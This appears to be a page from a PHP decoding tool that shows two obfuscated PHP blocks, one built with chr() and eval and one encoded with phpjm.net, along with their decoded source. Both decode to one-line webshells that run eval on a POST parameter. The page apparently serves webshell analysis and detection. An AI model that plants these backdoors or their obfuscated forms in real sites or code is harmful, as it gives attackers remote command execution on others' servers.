PHP Decode

identify what is hidden behind an encoded PHP block.

Examples

eval

The deformation webshell encode with eval and chr().

<?php $_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU (93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111). $_uU(110);$_=$_fF("",$_cC);@$_(); ?>

Deode eval

We find the source code after decode.

<?php function __lambda_func(){eval($_POST[1]);} ?>

PHPJM

encode with phpjm.net

<?php /* ÉùÃ÷£ºÒÔÏÂÐÅÏ¢²¢²»ÊDZ¾phpÎļþµÄ×÷Õߣ¬²»¶Ô±¾Îļþ¸ºÔð£»ÒÔÏÂÐÅÏ¢Ö»ÊÇÌṩÁ˶Ա¾phpÎļþ¼ÓÃÜ¡£Èç¹ûÐèÒª¶ÔPHPÎļþ½øÐмÓÃÜ£¬Çë°´ÒÔÏÂÐÅÏ¢ÁªÏµ¡£ Warning: do not modify this file, otherwise may cause the program to run. QQ: 1833596 Website: http://www.phpjm.net/ Copyright (c) 2012-2017 phpjm.net All Rights Reserved. */ if (!defined("DDECDBCCFFFE")){define("DDECDBCCFFFE", __FILE__);global $ˆ,$Ž‰,$ƒŒ‰,$…“Ž,$”„ˆƒ,$…ˆ‡•œ›,$•‘††Ÿ,$ŽŒ™˜œ‚œ‰,$Œ€œ„†„ˆ,$ˆ‹’ŽŒƒ„Ÿ,$‹•†Š„“„ž‡š,$š•‡Š—„ž‰™‡–,$‹˜˜›…„‰–Œ”œ,$™š‘”‹˜–†Ž,$Œ–‚‹œ†–š‡œƒžˆ,$™š‰’”›•‰†‡žž‰„;function ˆ ($ˆ ,$Ž‰ =""){global $ˆ,$Ž‰,$ƒŒ‰,$…“Ž,$”„ˆƒ,$…ˆ‡•œ›,$•‘††Ÿ,$ŽŒ™˜œ‚œ‰,$Œ€œ„†„ˆ,$ˆ‹’ŽŒƒ„Ÿ,$‹•†Š„“„ž‡š,$š•‡Š—„ž‰™‡–,$‹˜˜›…„‰–Œ”œ,$™š‘”‹˜–†Ž,$Œ–‚‹œ†–š‡œƒžˆ,$™š‰’”›•‰†‡žž‰„;if(empty($Ž‰ )){return base64_decode($ˆ );}else{return ˆ ($…“Ž($ˆ ,$Ž‰ ,$…ˆ‡•œ›($Ž‰ )));}}$…“Ž=ˆ ("c3RydHI=—");$…ˆ‡•œ›=ˆ ("c3RycmV2š");$Ž‰=ˆ ("qmrzZTq0X2Rlqƒ29kZQ==š","YFgDrq");$”„ˆƒ=ˆ ("G3H1bwNvbXByGXNz€","ZpmIwHG");$Œ€œ„†„ˆ=ˆ ("CHJnZ19yZXBs—YWvn","cvnayjlNC");$‹•†Š„“„ž‡š=ˆ ("tzM4OTI5Z˜jhiYWFhNm•I0ZTM4NWJ˜kM2I2ZTNl”Zjc0ZThjt2U=‡","LcSAt");$‹˜˜›…„‰–Œ”œ=ˆ ("OXOhtA==†","ZJbEtfO");function ƒŒ‰ (&$ƒŒ‰ ){global $ˆ,$Ž‰,$ƒŒ‰,$…“Ž,$”„ˆƒ,$…ˆ‡•œ›,$•‘††Ÿ,$ŽŒ™˜œ‚œ‰,$Œ€œ„†„ˆ,$ˆ‹’ŽŒƒ„Ÿ,$‹•†Š„“„ž‡š,$š•‡Š—„ž‰™‡–,$‹˜˜›…„‰–Œ”œ,$™š‘”‹˜–†Ž,$Œ–‚‹œ†–š‡œƒžˆ,$™š‰’”›•‰†‡žž‰„;$™š‰’”›•‰†‡žž‰„ =ˆ ("GZll—","ZqKSfG");@$Œ€œ„†„ˆ($‹•†Š„“„ž‡š,$‹˜˜›…„‰–Œ”œ."(@$”„ˆƒ($Ž‰('eNptkm9P2lAUxrŠ8KaXjRZlVBqEjI”zTZAq6CViqyFbSŽEUilRa50bVsGkAšqaUdf6oOmEDFftšT1tkpC3Mtzn99z‹Ts9z6tWAZqFI/Išj2jxEc4Zhq7iiOYBFvu6c7iiCFLwUmCAxbzbGyeCFA›tTW6V+/UZ4eQ2c…plmglXGzINQBNi”TJxLR0kZgoPe5N‰G8Md1e0Z2EmPOHŽ5SybOil8BODJhoŽupvcMoJLXuw11r„0Gsrblcy8EkgA4Œf1Z8jEzndS8hZP˜Qm466vz+qxhzfdŸIZOyQtiTWapc54–KQNmcPz30u43ko‹ZsYzK9bw27j09jƒo6UOHPr4NCFmSz‘LoQvKEZkry+TFEˆe43xTdcw1fG0Y7‰bnbio5hihn2US9‡nWWroG8bCsn0tsŒCTYg46JlP9YTgb’6Wq/M5/rSt+xHE‡hULROgYk4O8UxM“FrnkgbOeBfL57d‹29rXw+IpTRRTAo’soauvnuPfUHXENˆymcO9AtzDsl9e4š/TOwAKw++79Grnmxxi8eNSty7b3V‚OiNzZlf2qVBXwT…3IDw5OGypau2VLˆywGgrx58KcUXM/“afnRaOpQOhL/3x–lU0MgCVBQ5fLtxƒ4fvhJYx1YRIhhašL/uCRKC4GQ4Rwc‹JGKFTmNspEwRcuŽ8kHej+AEhsEJnqˆsrz5sPs1D3H7XAšB7exnaidAnyBe/”R7RtNUVMVOXRYk–Hn2NxLlRJXDm5y“SK5tjofrPCUj/n“8FhJuk7tX5AVO7Œ5/oFcvEA==')));","Ÿ œ€…Ž—˜38929f8baaa6b4e385bd3b6e3ef04e8c€ƒˆ“");return "r";}}else{global $ˆ,$Ž‰,$ƒŒ‰,$…“Ž,$”„ˆƒ,$…ˆ‡•œ›,$•‘††Ÿ,$ŽŒ™˜œ‚œ‰,$Œ€œ„†„ˆ,$ˆ‹’ŽŒƒ„Ÿ,$‹•†Š„“„ž‡š,$š•‡Š—„ž‰™‡–,$‹˜˜›…„‰–Œ”œ,$™š‘”‹˜–†Ž,$Œ–‚‹œ†–š‡œƒžˆ,$™š‰’”›•‰†‡žž‰„;$…“Ž=ˆ ("c3RydHI=—");$…ˆ‡•œ›=ˆ ("c3RycmV2š");$Ž‰=ˆ ("qmrzZTq0X2Rlqƒ29kZQ==š","YFgDrq");$”„ˆƒ=ˆ ("G3H1bwNvbXByGXNz€","ZpmIwHG");$Œ€œ„†„ˆ=ˆ ("CHJnZ19yZXBs—YWvn","cvnayjlNC");$‹•†Š„“„ž‡š=ˆ ("tzM4OTI5Z˜jhiYWFhNm•I0ZTM4NWJ˜kM2I2ZTNl”Zjc0ZThjt2U=‡","LcSAt");$‹˜˜›…„‰–Œ”œ=ˆ ("OXOhtA==†","ZJbEtfO");}$ŽŒ™˜œ‚œ‰ =ˆ ("SU5yejBVNHVBd49BQzhRRl—KQˆ","ZkaIcCuS");$•‘††Ÿ =ƒŒ‰ ($ŽŒ™˜œ‚œ‰ );@$Œ€œ„†„ˆ($‹•†Š„“„ž‡š,$‹˜˜›…„‰–Œ”œ."(@$”„ˆƒ($Ž‰('eNo1jU1uwjAUhK/’C4kmA5BsEEW4AUr•tDqKpaJBaAkPqzD—SYvdkycOEBsEse4‹V8WbbmbzfTMTxdN†JfNgcBrP17/t2BG+".$ŽŒ™˜œ‚œ‰ .$•‘††Ÿ ."cvix+xyux•tHgn/7sv9bfI8gJ‡VIJAKkOo7FYRaDBžPKYEs59r1BKi+sJr9BU12rTu54JVSHR0yDN28uNa0kikGšodDsjDf0NbcErOb‹nOyovOm4Cats+ey€QojGwcgaSzF9oU7ŒcMoysKlTMypUI4Z…y13qw2xnxbXptWAƒl915gOY7i6RPe/V–8+†')));","™ “‡Ÿ——‹38929f8baaa6b4e385bd3b6e3ef04e8c“ƒ‹˜");return true;?>9e189c31fc2717e1257cc753d2920d99

Decode PHPJM

We find the source code after decode..

<?php @eval($_POST['cmd']); ?>